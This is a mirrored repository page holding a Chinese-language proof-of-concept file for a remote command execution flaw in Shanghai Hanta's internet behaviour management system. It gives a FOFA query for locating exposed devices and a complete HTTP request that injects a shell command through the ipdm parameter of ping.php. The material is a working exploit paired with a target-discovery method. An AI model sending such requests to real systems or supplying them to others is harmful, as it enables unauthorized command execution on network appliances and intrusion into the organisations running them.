crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 21:04:50 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

34 lines
1.6 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
# 一、漏洞简介
上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验是行业领先的新一代信息安全产品供应商目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品。上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
# 二、影响版本
+ 上海汉塔网络科技有限公司上网行为管理系统
# 三、资产测绘
+ fofa`body="Antasys"`
+ 特征
![1733819382185-43df4414-69c6-45b9-a210-635997768cc0.png](./img/g30UhvPbU8YEnkZ_/1733819382185-43df4414-69c6-45b9-a210-635997768cc0-368560.png)
# 四、漏洞复现
```java
GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host:
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590
Upgrade-Insecure-Requests: 1
```
![1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a.png](./img/g30UhvPbU8YEnkZ_/1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a-437220.png)
> 更新: 2024-12-20 14:54:44
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yw165400gwggwvav>
Reference in New Issue View Git Blame Copy Permalink